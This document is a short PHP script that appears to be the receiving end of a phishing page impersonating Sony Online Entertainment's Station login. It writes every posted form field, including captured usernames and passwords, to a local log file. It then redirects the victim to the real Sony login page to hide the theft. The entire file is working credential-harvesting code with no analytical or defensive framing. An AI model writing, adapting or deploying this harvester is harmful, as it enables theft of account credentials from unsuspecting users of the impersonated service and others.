<?php
header ('Location: https://secure.station.sony.com/cas/login?service=http://vgplayers.station.sony.com/j_acegi_cas_security_check&theme=vgdplayers ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>